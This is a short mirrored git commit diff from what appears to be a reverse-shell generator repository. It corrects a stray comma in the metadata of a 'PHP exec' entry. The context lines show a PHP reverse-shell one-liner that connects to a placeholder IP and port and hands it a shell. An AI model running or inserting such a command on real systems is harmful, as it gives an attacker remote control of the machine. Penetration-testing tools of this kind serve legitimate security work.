mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 10:56:10 +00:00
commit
28774753ce
@ -174,7 +174,7 @@ const reverseShellCommands = withCommandType(
|
|||||||
{
|
{
|
||||||
"name": "PHP exec",
|
"name": "PHP exec",
|
||||||
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'",
|
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'",
|
||||||
"meta": ["linux", , "mac"]
|
"meta": ["linux", "mac"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "PHP shell_exec",
|
"name": "PHP shell_exec",
|
||||||
|
Loading…
Reference in New Issue
Block a user